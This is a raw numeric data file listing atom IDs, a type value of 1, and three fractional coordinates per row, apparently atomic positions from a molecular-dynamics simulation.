1900 1 0.252974 0.933835 0.812281
2027 1 0.306208 0.878153 0.936363
1999 1 0.439467 0.752573 0.937069
783 1 0.445744 1.00037 0.814371
655 1 0.440343 0.0104036 0.687435
1775 1 0.444153 0.879686 0.680785
1776 1 0.385327 0.938658 0.6807
1901 1 0.379564 0.878169 0.752628
1902 1 0.437484 0.939674 0.756539
1903 1 0.442418 0.878466 0.814536
1904 1 0.378778 0.942061 0.819664
898 1 0.057196 0.0575086 0.874735
904 1 0.1238 0.0631701 0.936912
931 1 0.0645168 0.121558 0.934463
933 1 0.12634 0.132915 0.871572
102 1 0.192942 0.440087 0.995471
899 1 0.0645493 0.999602 0.943014
69 1 0.124316 0.24885 0.99526
676 1 0.00571507 0.185698 0.690907
1556 1 0.494317 0.561138 0.561705
1995 1 0.305289 0.748763 0.937899
902 1 0.186701 0.0623423 0.879056
906 1 0.301852 0.0618685 0.871439
908 1 0.245355 0.0654125 0.937541
935 1 0.189581 0.129332 0.935199
937 1 0.236343 0.131526 0.864791
939 1 0.311546 0.127771 0.937102
1996 1 0.251232 0.814121 0.942979
2025 1 0.245723 0.87381 0.867435
1991 1 0.190065 0.749352 0.941111
1998 1 0.437383 0.821198 0.877679
910 1 0.438064 0.0567752 0.873018
912 1 0.367951 0.0607949 0.935275
941 1 0.383541 0.120228 0.875501
943 1 0.435476 0.116136 0.938235
2022 1 0.185272 0.931106 0.878513
930 1 0.0586169 0.184999 0.871282
936 1 0.127687 0.194528 0.932634
962 1 0.0611355 0.310161 0.863401
963 1 0.0592645 0.254106 0.927269
965 1 0.122943 0.248476 0.866564
968 1 0.121783 0.305507 0.929101
1958 1 0.18204 0.691293 0.874967
1964 1 0.244378 0.68517 0.938731
37 1 0.130206 0.126874 0.997449
934 1 0.188662 0.194471 0.874177
938 1 0.309425 0.186258 0.872853
940 1 0.254593 0.188746 0.937757
966 1 0.183136 0.308462 0.866245
967 1 0.186874 0.247557 0.932074
969 1 0.248036 0.257609 0.87188
970 1 0.317613 0.304342 0.873077
971 1 0.312254 0.245943 0.934881
972 1 0.248416 0.309535 0.938958
1966 1 0.434146 0.692926 0.870398
1968 1 0.369448 0.691562 0.940839
2026 1 0.314636 0.93597 0.875944
973 1 0.382305 0.247556 0.880076
944 1 0.37933 0.184032 0.936097
942 1 0.43945 0.185354 0.87405
976 1 0.370115 0.310428 0.943083
975 1 0.446443 0.243382 0.942095
974 1 0.440433 0.309832 0.887705
2028 1 0.244546 0.933213 0.946901
903 1 0.188549 0.00336506 0.93813
995 1 0.0658704 0.366791 0.928996
994 1 0.0616245 0.432058 0.874883
1000 1 0.124437 0.439096 0.936355
997 1 0.131884 0.377558 0.8739
1925 1 0.11888 0.496081 0.876992
998 1 0.196336 0.435414 0.878721
999 1 0.190383 0.374319 0.94043
1004 1 0.258957 0.436165 0.938099
1001 1 0.252775 0.376553 0.876843
1002 1 0.319616 0.437641 0.88003
1003 1 0.31837 0.368249 0.938032
1929 1 0.252628 0.497959 0.874993
1927 1 0.183831 0.50073 0.933959
1997 1 0.375268 0.753037 0.880934
2021 1 0.120907 0.870081 0.876919
1935 1 0.433761 0.497232 0.942544
1006 1 0.445908 0.438337 0.877866
1007 1 0.438433 0.377893 0.941036
1005 1 0.379618 0.371833 0.882147
1008 1 0.376373 0.430001 0.944569
618 1 0.315684 0.440572 0.505715
2000 1 0.368248 0.816397 0.942669
1923 1 0.0603876 0.501027 0.94025
1922 1 0.0641632 0.568887 0.87597
1928 1 0.126493 0.566133 0.932849
1955 1 0.0615793 0.625914 0.941485
1957 1 0.119855 0.630035 0.876498
1931 1 0.321025 0.497917 0.938149
1930 1 0.317474 0.561447 0.881146
1926 1 0.185393 0.571867 0.876105
1963 1 0.315046 0.619896 0.940713
1961 1 0.255403 0.620819 0.874536
1932 1 0.254523 0.557859 0.940743
1959 1 0.18774 0.621303 0.937597
101 1 0.128267 0.372479 0.994001
1965 1 0.380284 0.62991 0.874858
1933 1 0.380755 0.4996 0.874313
1934 1 0.44068 0.562525 0.867585
1936 1 0.373429 0.557591 0.939867
1967 1 0.434178 0.626591 0.934722
2018 1 0.0562667 0.939308 0.880616
1645 1 0.37292 0.883949 0.500644
1986 1 0.062728 0.808636 0.87709
1987 1 0.0649266 0.748505 0.940496
1954 1 0.0628725 0.688741 0.874063
1992 1 0.126664 0.808882 0.944444
1989 1 0.11751 0.755229 0.87117
1960 1 0.127991 0.68945 0.940511
2024 1 0.119328 0.933088 0.945891
2019 1 0.0629822 0.869326 0.941437
1993 1 0.24825 0.751096 0.880715
1962 1 0.307056 0.683228 0.87174
1990 1 0.182964 0.811126 0.872134
1994 1 0.316367 0.813378 0.875495
578 1 0.0627028 0.304823 0.506388
5 1 0.125446 0.000723105 0.997321
98 1 0.0589141 0.434514 0.989479
517 1 0.121322 0.99671 0.503666
1614 1 0.436843 0.813252 0.506719
546 1 0.059554 0.191945 0.502994
1606 1 0.191597 0.810501 0.505685
585 1 0.241013 0.251271 0.504118
105 1 0.250517 0.368615 0.994275
550 1 0.189966 0.184479 0.504277
593 1 0.496416 0.252541 0.501958
70 1 0.18703 0.312825 0.989453
66 1 0.0572404 0.310689 0.99272
1065 1 0.245152 0.618559 0.997561
1646 1 0.439152 0.936101 0.505053
14 1 0.431062 0.0605496 0.998991
513 1 0.00416782 0.995082 0.501345
521 1 0.24454 0.00546919 0.501048
49 1 0.49628 0.117444 0.99618
38 1 0.18686 0.18882 0.993603
1537 1 0.002744 0.496115 0.50043
1609 1 0.25181 0.751717 0.5017
1641 1 0.256223 0.878358 0.502951
589 1 0.377624 0.255393 0.50084
610 1 0.067379 0.43526 0.506343
557 1 0.373615 0.12302 0.501914
1093 1 0.129804 0.745721 0.998706
1613 1 0.370087 0.750559 0.502235
586 1 0.309577 0.312288 0.505774
590 1 0.436916 0.314994 0.501716
614 1 0.18108 0.435478 0.502321
24 1 0.61652 0.0639868 0.0639923
51 1 0.561726 0.123549 0.0625075
146 1 0.558751 0.0624668 0.128246
181 1 0.619534 0.132627 0.125983
1046 1 0.688794 0.561295 0.00676505
1042 1 0.55412 0.56842 0.00604627
30 1 0.944 0.0704449 0.0111431
1156 1 0.996311 0.567463 0.182661
1141 1 0.620855 0.869622 0.00477491
1625 1 0.750271 0.753212 0.497917
28 1 0.752431 0.067535 0.0591513
55 1 0.689401 0.12472 0.0612507
59 1 0.815374 0.123993 0.0630316
150 1 0.684785 0.0645301 0.118252
154 1 0.804772 0.0585936 0.118982
185 1 0.757183 0.126348 0.125756
20 1 0.504395 0.0669701 0.0636847
32 1 0.872091 0.0632495 0.0715122
63 1 0.941012 0.132287 0.0682557
158 1 0.941459 0.0585374 0.11878
189 1 0.87685 0.130752 0.126623
31 1 0.934739 0.00450296 0.0575795
1654 1 0.677654 0.931476 0.497526
157 1 0.870614 0.00178006 0.125142
1092 1 0.998545 0.811784 0.0685379
65 1 0.995841 0.250654 0.00154696
356 1 0.999726 0.435274 0.310781
385 1 0.999152 0.998112 0.37711
56 1 0.624507 0.186271 0.0605496
83 1 0.557814 0.249569 0.0596813
88 1 0.62561 0.309367 0.0649043
178 1 0.553311 0.182163 0.120937
210 1 0.564413 0.315219 0.131536
213 1 0.628088 0.248575 0.11839
1533 1 0.867562 0.878912 0.370549
122 1 0.816081 0.43848 0.0035237
420 1 0.997591 0.191417 0.438142
60 1 0.7468 0.189071 0.0676724
87 1 0.694176 0.250758 0.0623218
91 1 0.810815 0.253773 0.0614268
92 1 0.755093 0.31551 0.0672134
182 1 0.688581 0.178886 0.12295
186 1 0.809707 0.190719 0.121646
214 1 0.68904 0.308419 0.129847
217 1 0.752983 0.250292 0.127412
218 1 0.815878 0.310097 0.13401
1281 1 0.996535 0.502691 0.249765
64 1 0.871505 0.188049 0.0625631
95 1 0.929725 0.25496 0.0708676
96 1 0.870895 0.309479 0.0686052
190 1 0.937005 0.191163 0.128611
221 1 0.874065 0.247912 0.131181
222 1 0.942598 0.310634 0.127805
1534 1 0.93834 0.937908 0.377309
1535 1 0.941257 0.869733 0.440643
1444 1 0.998276 0.682695 0.437442
177 1 0.500418 0.117943 0.124285
125 1 0.876912 0.38303 0.000934928
115 1 0.563964 0.373598 0.0643414
120 1 0.627402 0.439479 0.0646914
242 1 0.569412 0.442108 0.122812
245 1 0.624382 0.377824 0.130061
1043 1 0.563025 0.499787 0.0561492
1536 1 0.878961 0.930645 0.43788
1425 1 0.504436 0.504243 0.374606
1140 1 0.503095 0.930024 0.0598587
340 1 0.503502 0.311541 0.317335
119 1 0.686595 0.372349 0.06684
123 1 0.819614 0.377564 0.066021
124 1 0.744076 0.439161 0.0620933
246 1 0.685383 0.438552 0.128725
249 1 0.751116 0.381552 0.124045
250 1 0.811988 0.436888 0.125968
84 1 0.504528 0.312291 0.0711695
1428 1 0.501529 0.558912 0.435462
1145 1 0.751496 0.877711 0.000464378
127 1 0.936222 0.375454 0.0759746
128 1 0.875048 0.439422 0.0661696
253 1 0.871544 0.377105 0.12791
254 1 0.94362 0.439895 0.122879
1055 1 0.936701 0.503677 0.0601806
436 1 0.500698 0.185763 0.440782
1173 1 0.625807 0.508178 0.125937
1048 1 0.622871 0.570642 0.0684236
1075 1 0.557108 0.631153 0.0642313
1170 1 0.560186 0.567275 0.119217
1205 1 0.616195 0.624628 0.130091
1316 1 0.999063 0.68712 0.31225
132 1 1.00008 0.062578 0.188956
1521 1 0.508024 0.874829 0.373017
1051 1 0.814176 0.506819 0.061355
1047 1 0.687021 0.504456 0.0666931
1177 1 0.743878 0.505912 0.122531
1052 1 0.749744 0.563382 0.0649402
1079 1 0.688812 0.624236 0.0690357
1083 1 0.815371 0.622036 0.0703736
1174 1 0.683543 0.562909 0.133605
1178 1 0.812061 0.55981 0.124245
1209 1 0.74804 0.624291 0.125386
415 1 0.934907 0.994242 0.441957
1181 1 0.87708 0.492076 0.130159
1056 1 0.877259 0.564234 0.0643564
1087 1 0.934187 0.626377 0.0650532
1182 1 0.931407 0.559891 0.123895
1213 1 0.873629 0.630118 0.130939
1113 1 0.748697 0.74748 0.00538187
465 1 0.505633 0.250118 0.378674
1028 1 0.997044 0.566149 0.0581306
1080 1 0.62424 0.690863 0.0685395
1107 1 0.567208 0.749001 0.0634145
1112 1 0.631343 0.811577 0.0600996
1202 1 0.564542 0.689331 0.134079
1234 1 0.562259 0.812773 0.128356
1237 1 0.630929 0.75889 0.124475
1106 1 0.559274 0.807677 0.00986916
1084 1 0.745919 0.690085 0.0694717
1111 1 0.690557 0.756605 0.0687368
1115 1 0.808659 0.749774 0.0664194
1116 1 0.751162 0.819822 0.0610201
1206 1 0.687114 0.690704 0.12728
1210 1 0.807756 0.686529 0.127813
1238 1 0.688306 0.819668 0.1259
1241 1 0.744014 0.751008 0.131916
1242 1 0.809286 0.81876 0.122835
1088 1 0.876383 0.691614 0.0661843
1119 1 0.933659 0.746669 0.0607069
1120 1 0.87819 0.809391 0.0580108
1214 1 0.935978 0.691401 0.129082
1245 1 0.873919 0.74841 0.127201
1246 1 0.936212 0.812516 0.126039
1265 1 0.503136 0.878486 0.12763
409 1 0.74581 0.994191 0.378363
257 1 0.999812 0.00362646 0.246403
161 1 0.99781 0.128134 0.129134
19 1 0.56353 0.00415987 0.0560429
149 1 0.621777 0.00167839 0.122669
407 1 0.685206 0.00209633 0.44228
1526 1 0.688929 0.93951 0.374468
1396 1 0.505237 0.938843 0.315137
1139 1 0.561399 0.872077 0.0643804
1144 1 0.616696 0.939873 0.0598986
1266 1 0.56245 0.94122 0.123609
1269 1 0.617142 0.877981 0.124407
27 1 0.810412 0.998387 0.0612406
153 1 0.744265 0.999163 0.127431
23 1 0.687332 0.00392487 0.0586999
1143 1 0.68961 0.870572 0.062952
1147 1 0.820933 0.87578 0.0598506
1148 1 0.759222 0.935119 0.062876
1270 1 0.685855 0.93349 0.119691
1273 1 0.750891 0.88057 0.128257
1274 1 0.811681 0.936916 0.120686
1151 1 0.930596 0.884005 0.0606789
1152 1 0.870896 0.944437 0.0632751
1277 1 0.879408 0.879168 0.130903
1278 1 0.9449 0.946178 0.124067
324 1 0.995707 0.317139 0.31026
68 1 0.994834 0.312223 0.0632206
209 1 0.50372 0.246014 0.126917
1529 1 0.757154 0.878888 0.376157
152 1 0.61783 0.0642537 0.18419
179 1 0.562089 0.126493 0.189917
274 1 0.560756 0.063073 0.246547
280 1 0.627024 0.062065 0.305691
307 1 0.567998 0.128883 0.313166
309 1 0.623624 0.131088 0.246305
156 1 0.747852 0.0675097 0.187324
183 1 0.686945 0.122688 0.186494
187 1 0.818746 0.130843 0.189057
278 1 0.684076 0.0679867 0.246413
282 1 0.810702 0.0562588 0.24482
284 1 0.746248 0.0552521 0.30751
311 1 0.692259 0.131508 0.315748
313 1 0.755451 0.124151 0.246729
315 1 0.813572 0.118449 0.312987
155 1 0.814809 0.996411 0.188787
281 1 0.7454 0.00297542 0.246226
283 1 0.808707 0.00124256 0.310229
160 1 0.87172 0.0644391 0.179776
191 1 0.934063 0.129305 0.186706
286 1 0.934489 0.0682807 0.248488
288 1 0.875749 0.055904 0.312611
317 1 0.874017 0.123815 0.250805
319 1 0.941793 0.125987 0.313342
159 1 0.941306 0.00594891 0.187673
287 1 0.936875 0.997906 0.317221
285 1 0.873032 -0.000128758 0.249802
1527 1 0.688479 0.872211 0.445789
468 1 0.508864 0.312592 0.434463
1530 1 0.810965 0.939058 0.368762
260 1 0.998803 0.0617635 0.312366
184 1 0.619299 0.187999 0.186848
211 1 0.566185 0.245989 0.178522
216 1 0.624598 0.311094 0.190029
306 1 0.55696 0.194782 0.247956
312 1 0.624772 0.18633 0.313192
338 1 0.558917 0.304989 0.243651
339 1 0.555496 0.248837 0.314997
341 1 0.620712 0.246675 0.252525
344 1 0.622495 0.315756 0.311124
565 1 0.624833 0.129733 0.493482
1441 1 0.999752 0.631802 0.374025
61 1 0.872361 0.124175 0.00147212
188 1 0.7574 0.185729 0.18482
215 1 0.691907 0.243981 0.189426
219 1 0.810828 0.25494 0.196569
220 1 0.751811 0.315366 0.189994
310 1 0.686454 0.182718 0.250532
314 1 0.816746 0.185025 0.250162
316 1 0.758037 0.187301 0.315193
342 1 0.683082 0.305938 0.253492
343 1 0.685781 0.246569 0.31273
345 1 0.74958 0.241828 0.249034
346 1 0.811634 0.308684 0.255498
347 1 0.819181 0.244293 0.314231
348 1 0.750318 0.310724 0.308133
1531 1 0.80996 0.875008 0.439572
1532 1 0.743024 0.937154 0.437069
192 1 0.877662 0.192267 0.193461
223 1 0.936561 0.253039 0.189903
224 1 0.874443 0.317515 0.193093
318 1 0.938544 0.191687 0.252379
320 1 0.880539 0.188249 0.323294
349 1 0.878684 0.253339 0.254229
350 1 0.936102 0.324125 0.247539
351 1 0.939088 0.256015 0.314995
352 1 0.871166 0.315235 0.311879
116 1 0.502921 0.435989 0.0568584
1082 1 0.810711 0.685217 0.0108632
1086 1 0.93978 0.68444 0.0084982
1078 1 0.687365 0.691859 0.0139454
243 1 0.559975 0.37667 0.189208
248 1 0.623698 0.4327 0.191278
370 1 0.555244 0.441833 0.245691
371 1 0.558222 0.376033 0.307114
373 1 0.61875 0.367741 0.245556
376 1 0.62019 0.438862 0.307571
247 1 0.683943 0.373853 0.189399
251 1 0.807048 0.376494 0.195539
252 1 0.747245 0.436485 0.189152
374 1 0.685177 0.43438 0.245552
375 1 0.680012 0.37887 0.309021
377 1 0.748813 0.373966 0.254988
378 1 0.812841 0.441024 0.239763
379 1 0.807771 0.379762 0.316554
380 1 0.741519 0.434124 0.310485
1457 1 0.503246 0.626167 0.37899
244 1 0.502077 0.435991 0.185323
1586 1 0.569165 0.682158 0.496249
255 1 0.936281 0.377715 0.181568
256 1 0.876923 0.435969 0.186997
381 1 0.872574 0.378317 0.248477
382 1 0.939349 0.430488 0.24402
383 1 0.933188 0.375765 0.315313
384 1 0.874564 0.4363 0.310055
1311 1 0.934607 0.498592 0.312119
1171 1 0.559005 0.503547 0.178226
1301 1 0.615948 0.50227 0.240971
1299 1 0.555832 0.503442 0.3045
1176 1 0.622339 0.565895 0.191169
1203 1 0.558388 0.626234 0.185582
1298 1 0.554193 0.562795 0.24459
1304 1 0.628728 0.563994 0.30988
1331 1 0.569752 0.629347 0.315296
1333 1 0.623202 0.633435 0.252891
1523 1 0.562389 0.871668 0.436299
1305 1 0.741803 0.503628 0.249529
1179 1 0.814127 0.504108 0.183014
1307 1 0.811331 0.493717 0.305061
1303 1 0.681073 0.494868 0.308736
1175 1 0.677694 0.49503 0.188242
1180 1 0.749337 0.566686 0.192137
1207 1 0.683001 0.628406 0.185019
1211 1 0.807024 0.624112 0.187608
1302 1 0.685466 0.563718 0.245528
1306 1 0.815126 0.561248 0.247081
1308 1 0.752223 0.558381 0.313173
1335 1 0.687722 0.622717 0.310928
1337 1 0.743789 0.620411 0.257246
1339 1 0.809292 0.61929 0.316123
1309 1 0.875133 0.502414 0.244368
1183 1 0.938218 0.499296 0.187403
1184 1 0.872107 0.567158 0.18903
1215 1 0.939721 0.623948 0.184225
1310 1 0.932917 0.567327 0.251006
1312 1 0.87168 0.558847 0.314698
1341 1 0.870914 0.624199 0.258154
1343 1 0.930749 0.627164 0.313203
1528 1 0.62681 0.935482 0.430534
626 1 0.565643 0.440229 0.498688
1525 1 0.62834 0.866448 0.381265
1208 1 0.627441 0.689759 0.193465
1235 1 0.567134 0.749844 0.194968
1240 1 0.634479 0.819306 0.19862
1330 1 0.560699 0.684659 0.252771
1336 1 0.622968 0.693305 0.314463
1362 1 0.56919 0.811855 0.246919
1363 1 0.562894 0.749854 0.313684
1365 1 0.625153 0.748909 0.253074
1368 1 0.632424 0.811408 0.319036
1522 1 0.567228 0.935374 0.368966
1212 1 0.751677 0.685826 0.188445
1239 1 0.689885 0.748549 0.18824
1243 1 0.808919 0.751266 0.185559
1244 1 0.750314 0.817063 0.188544
1334 1 0.690441 0.687342 0.255184
1338 1 0.80918 0.68437 0.246691
1340 1 0.749956 0.68939 0.312843
1366 1 0.697683 0.812279 0.256603
1367 1 0.682079 0.747484 0.317905
1369 1 0.751345 0.742912 0.252787
1370 1 0.803796 0.809761 0.249275
1371 1 0.81303 0.747177 0.314391
1372 1 0.751471 0.814572 0.315501
405 1 0.625556 0.997432 0.37451
1590 1 0.691351 0.684666 0.497907
273 1 0.503986 0.994873 0.249561
1216 1 0.875886 0.69175 0.192998
1247 1 0.933684 0.751462 0.192691
1248 1 0.874926 0.815481 0.182569
1342 1 0.938392 0.685795 0.254014
1344 1 0.872435 0.690828 0.313361
1373 1 0.869494 0.75323 0.249814
1374 1 0.92887 0.815878 0.249299
1375 1 0.932161 0.75375 0.313498
1376 1 0.869581 0.819783 0.309907
1393 1 0.502089 0.87499 0.251322
388 1 0.99973 0.0682882 0.43459
277 1 0.620528 -0.00173588 0.247485
275 1 0.560788 0.00316235 0.312792
147 1 0.561441 0.00078512 0.186436
1267 1 0.561556 0.878333 0.184465
1272 1 0.62569 0.937979 0.189092
1394 1 0.560029 0.940692 0.249014
1395 1 0.564563 0.873657 0.312726
1397 1 0.62719 0.877727 0.255308
1400 1 0.622958 0.9414 0.309227
1284 1 0.994118 0.561453 0.308257
151 1 0.682882 0.00355938 0.188864
279 1 0.684471 0.999833 0.31166
1271 1 0.689564 0.876057 0.189772
1275 1 0.815728 0.878144 0.188703
1276 1 0.752771 0.945339 0.190086
1398 1 0.686679 0.937647 0.249689
1399 1 0.688449 0.874784 0.316771
1401 1 0.750796 0.880203 0.250964
1402 1 0.813816 0.941883 0.252413
1403 1 0.81072 0.883236 0.30729
1404 1 0.745084 0.943112 0.305741
530 1 0.561834 0.0681197 0.493836
1279 1 0.941815 0.884112 0.188725
1280 1 0.879647 0.940301 0.187606
1405 1 0.877266 0.876287 0.247704
1406 1 0.940613 0.942693 0.253908
1407 1 0.938492 0.877535 0.312397
1408 1 0.880698 0.935176 0.309046
1621 1 0.626745 0.75503 0.498964
452 1 0.999031 0.314564 0.445711
402 1 0.572802 0.0661139 0.368372
408 1 0.626269 0.0559878 0.433871
435 1 0.562402 0.124705 0.431002
437 1 0.623096 0.129773 0.373402
403 1 0.561972 0.00538229 0.438456
411 1 0.806751 0.992331 0.451158
406 1 0.682059 0.0629148 0.370847
410 1 0.810995 0.0587209 0.368236
412 1 0.747725 0.0604127 0.43182
439 1 0.686792 0.125376 0.436995
441 1 0.752721 0.127742 0.381401
443 1 0.811846 0.120912 0.44081
62 1 0.940984 0.192608 0.004035
113 1 0.502136 0.371982 0.00597655
1473 1 0.999468 0.757603 0.374504
413 1 0.874704 0.998924 0.374453
481 1 0.995089 0.378508 0.378247
414 1 0.937556 0.0598863 0.36973
416 1 0.877705 0.0524322 0.442539
445 1 0.872381 0.117396 0.373648
447 1 0.939919 0.129628 0.435149
228 1 0.997123 0.43827 0.183281
1662 1 0.936047 0.931161 0.49986
1472 1 0.876998 0.686554 0.447352
469 1 0.622176 0.251597 0.371737
466 1 0.561634 0.317593 0.369927
472 1 0.631051 0.31419 0.43343
434 1 0.560317 0.1883 0.374008
467 1 0.56665 0.248498 0.436351
440 1 0.632557 0.194458 0.436336
1499 1 0.812271 0.746448 0.439236
1466 1 0.807393 0.684896 0.372196
90 1 0.816873 0.31959 0.00424925
475 1 0.809545 0.24388 0.438651
471 1 0.690133 0.251865 0.440919
442 1 0.813425 0.184508 0.377729
476 1 0.748782 0.31176 0.439466
474 1 0.809835 0.311359 0.376494
438 1 0.690035 0.187626 0.375778
473 1 0.75079 0.251855 0.374626
470 1 0.68671 0.312326 0.37318
444 1 0.749264 0.187407 0.440246
1494 1 0.692174 0.811646 0.376968
1468 1 0.748827 0.682479 0.437587
1462 1 0.688425 0.689051 0.376043
446 1 0.943519 0.191334 0.377113
477 1 0.876346 0.254203 0.382693
478 1 0.942895 0.313328 0.376561
448 1 0.88 0.186395 0.436455
480 1 0.86997 0.30994 0.442095
479 1 0.942015 0.256141 0.445987
1500 1 0.758315 0.807114 0.432506
529 1 0.500221 0.993 0.499725
1137 1 0.498427 0.871472 0.00156903
1498 1 0.813606 0.811476 0.369104
1236 1 0.500605 0.805489 0.192467
498 1 0.562214 0.433818 0.376979
499 1 0.563211 0.371046 0.440961
501 1 0.621438 0.376103 0.373486
504 1 0.623147 0.436397 0.437225
82 1 0.55576 0.314087 0.0076356
1503 1 0.93647 0.744495 0.435461
484 1 0.998825 0.438927 0.432599
505 1 0.741511 0.375001 0.373475
503 1 0.689408 0.372971 0.441486
508 1 0.754837 0.442412 0.436692
507 1 0.811169 0.373533 0.437875
506 1 0.808954 0.441365 0.374749
502 1 0.68152 0.439648 0.369065
1433 1 0.750027 0.494494 0.369693
1431 1 0.689483 0.503406 0.433062
1435 1 0.808587 0.500176 0.441096
1504 1 0.878611 0.807762 0.44325
1501 1 0.87231 0.751128 0.376735
1364 1 0.501691 0.813703 0.307391
512 1 0.869795 0.440882 0.428172
511 1 0.926408 0.378 0.44716
510 1 0.93293 0.438941 0.374862
509 1 0.873787 0.374738 0.375856
1439 1 0.935403 0.49948 0.435677
1437 1 0.869164 0.504513 0.373797
1470 1 0.936503 0.687043 0.372234
1505 1 0.99205 0.875605 0.373157
1502 1 0.934533 0.817606 0.37333
1427 1 0.566459 0.500647 0.435474
1429 1 0.622739 0.500372 0.373579
1461 1 0.624356 0.630443 0.380457
1426 1 0.574583 0.567621 0.371252
1432 1 0.625174 0.564993 0.442047
1459 1 0.565251 0.623978 0.43297
1430 1 0.681864 0.559228 0.372753
1463 1 0.684582 0.622212 0.433649
1436 1 0.749596 0.561067 0.428903
1434 1 0.808529 0.561777 0.37689
1465 1 0.748744 0.621739 0.374588
1467 1 0.813147 0.627826 0.432157
1626 1 0.811144 0.810241 0.497263
1495 1 0.689636 0.74882 0.433537
1497 1 0.74836 0.749449 0.375344
1491 1 0.565581 0.752456 0.434767
1440 1 0.86921 0.561489 0.435847
1469 1 0.877241 0.629455 0.376166
1471 1 0.934439 0.627022 0.438394
1438 1 0.934738 0.561314 0.374845
1496 1 0.625611 0.811166 0.439426
1490 1 0.557866 0.813549 0.374658
1458 1 0.562324 0.694304 0.374064
1493 1 0.623945 0.75541 0.378835
1464 1 0.633407 0.693018 0.442257
1585 1 0.50579 0.630322 0.491428
1268 1 0.501085 0.942179 0.184255
1460 1 0.502185 0.694975 0.439669
276 1 0.503166 0.0601083 0.317747
1566 1 0.932588 0.565498 0.496227
1601 1 1.00073 0.743222 0.496623
1348 1 0.995522 0.818706 0.306938
372 1 0.505241 0.437792 0.314705
1081 1 0.7539 0.629309 0.00936001
52 1 0.501039 0.187175 0.0590406
93 1 0.874452 0.250251 0.00365592
1153 1 0.997002 0.504303 0.12405
534 1 0.684547 0.0620802 0.499142
638 1 0.937175 0.440564 0.499047
1085 1 0.879565 0.626021 0.00205629
1300 1 0.504543 0.572842 0.316653
1 1 0.999918 0.0022289 0.00257817
121 1 0.748074 0.373526 0.00209814
1650 1 0.569114 0.931553 0.501516
629 1 0.623353 0.372396 0.498118
100 1 0.997569 0.438103 0.0639364
1332 1 0.503829 0.682708 0.315029
145 1 0.504294 0.00185417 0.118349
404 1 0.506229 0.0662514 0.432874
1313 1 0.994488 0.628625 0.249971
1233 1 0.503056 0.753162 0.122769
1565 1 0.879047 0.505446 0.497783
1077 1 0.622395 0.624131 0.00368414
1630 1 0.944225 0.805743 0.498497
1172 1 0.500983 0.563987 0.177098
85 1 0.620304 0.251274 0.00259435
1142 1 0.688734 0.939688 0.000376457
1524 1 0.502844 0.943526 0.435473
118 1 0.686155 0.436776 0.00194062
308 1 0.501305 0.186732 0.312739
1557 1 0.626231 0.503105 0.498919
1593 1 0.755171 0.617522 0.488961
58 1 0.812989 0.184841 0.00489232
1618 1 0.560415 0.809184 0.49696
630 1 0.688642 0.44139 0.488425
542 1 0.939459 0.0597178 0.493671
114 1 0.571003 0.436275 0.00194492
1561 1 0.745674 0.504799 0.493257
1562 1 0.815803 0.556298 0.497245
117 1 0.624674 0.376824 0.00678674
1594 1 0.809592 0.678481 0.498813
566 1 0.686565 0.185988 0.494541
1589 1 0.632583 0.626779 0.497386
573 1 0.875325 0.120107 0.493922
1149 1 0.873835 0.883789 0.000381769
538 1 0.806821 0.0589003 0.496191
26 1 0.813586 0.0633839 -0.000854491
1050 1 0.812544 0.567758 0.00377428
21 1 0.625689 -0.000878261 0.00191972
1045 1 0.630591 0.506875 0.00306885
53 1 0.632612 0.124704 1.06063e-06
605 1 0.874184 0.243947 0.496151
126 1 0.939477 0.440589 0.00156308
17 1 0.503104 -0.00081528 0.00116686
536 1 0.615267 0.0584235 0.565356
563 1 0.569246 0.127882 0.557952
658 1 0.55907 0.059959 0.624786
693 1 0.625794 0.114963 0.624054
661 1 0.626966 0.00243786 0.624143
531 1 0.563295 0.989862 0.562303
22 1 0.691052 0.0579358 0.996974
1597 1 0.870005 0.623668 0.498836
1598 1 0.940548 0.687187 0.505563
597 1 0.625461 0.248927 0.502509
540 1 0.748789 0.0578968 0.558174
567 1 0.688024 0.127626 0.558249
571 1 0.811688 0.12281 0.565703
662 1 0.688761 0.0612079 0.620604
666 1 0.814349 0.0545605 0.623597
697 1 0.748592 0.12357 0.61469
539 1 0.81446 0.996512 0.560532
535 1 0.684403 0.998764 0.562765
1972 1 0.502576 0.696505 0.938468
1617 1 0.501245 0.748165 0.505866
544 1 0.876415 0.0620732 0.557439
575 1 0.939059 0.126187 0.561345
670 1 0.934011 0.0590281 0.620472
701 1 0.875024 0.13096 0.624339
543 1 0.94723 0.995941 0.559256
708 1 0.988831 0.309866 0.683043
568 1 0.629747 0.189516 0.568254
595 1 0.56285 0.247533 0.562414
600 1 0.628652 0.312498 0.57156
690 1 0.565961 0.184304 0.623201
722 1 0.564891 0.312027 0.621554
725 1 0.625898 0.253417 0.625553
89 1 0.750354 0.245248 0.995129
785 1 0.501769 1.00111 0.751522
572 1 0.750471 0.192637 0.565154
599 1 0.685162 0.248109 0.559796
603 1 0.818865 0.241933 0.560927
604 1 0.747325 0.30476 0.557479
694 1 0.685191 0.186411 0.627727
698 1 0.815742 0.183688 0.626194
726 1 0.691107 0.31288 0.620704
729 1 0.750022 0.247669 0.620237
730 1 0.81569 0.309176 0.616521
612 1 0.994932 0.436806 0.559822
57 1 0.754021 0.132051 0.998415
576 1 0.880134 0.179132 0.557922
607 1 0.928441 0.248163 0.56481
608 1 0.874883 0.311917 0.558242
702 1 0.939348 0.185687 0.620711
733 1 0.87445 0.244756 0.623697
734 1 0.934562 0.318705 0.621592
596 1 0.502603 0.321699 0.563365
627 1 0.565715 0.376275 0.558756
632 1 0.625826 0.437357 0.558999
754 1 0.563952 0.441687 0.624034
757 1 0.622336 0.375521 0.626625
1555 1 0.560351 0.500542 0.558142
1681 1 0.50153 0.501519 0.623319
606 1 0.934704 0.309977 0.507646
2001 1 0.5035 0.753764 0.869717
1969 1 0.501066 0.634522 0.871276
631 1 0.690734 0.378158 0.558367
635 1 0.80953 0.372806 0.561842
636 1 0.746473 0.440175 0.549889
758 1 0.688223 0.432592 0.622878
761 1 0.748865 0.380371 0.615352
762 1 0.81258 0.437524 0.618522
2004 1 0.503069 0.807198 0.941247
1689 1 0.745232 0.493969 0.619671
945 1 0.503732 0.119778 0.882503
788 1 0.503076 0.0641771 0.812566
916 1 0.500747 0.0611246 0.93768
639 1 0.931234 0.376626 0.558488
640 1 0.878906 0.448004 0.56426
765 1 0.873437 0.375871 0.616397
766 1 0.938568 0.435216 0.620609
1567 1 0.937078 0.50258 0.558045
1693 1 0.876886 0.501601 0.62959
1828 1 0.996664 0.684571 0.810102
964 1 0.996004 0.311883 0.928738
1685 1 0.623185 0.495442 0.622552
1560 1 0.624772 0.560162 0.562602
1587 1 0.564528 0.622007 0.557449
1682 1 0.562701 0.563517 0.624733
